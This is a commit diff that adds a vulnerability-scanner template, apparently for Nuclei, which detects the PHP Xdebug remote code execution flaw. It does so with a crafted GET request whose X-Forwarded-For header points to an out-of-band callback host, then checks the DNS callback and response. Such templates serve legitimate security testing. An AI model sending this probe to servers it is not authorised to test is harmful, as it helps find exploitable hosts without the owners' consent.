add php-xdebug-rce

vulnerabilities/php-xdebug-rce.yaml

@@ -0,0 +1,35 @@
+id: php-xdebug-rce
+
+info:
+  name: PHP-Xdebug-RCE
+  author: pwnhxl
+  severity: high
+  description: PHP Xdebug Remote Code Exec.
+  reference:
+    - https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
+    - https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/
+    - https://paper.seebug.org/397/
+  tags: php,debug,xdebug,oast,rce
+
+requests:
+  - raw:
+      - |
+        GET /?XDEBUG_SESSION_START={{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-For: {{interactsh-url}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie: XDEBUG_SESSION={{randstr}}'
+
+      - type: status
+        status:
+          - 200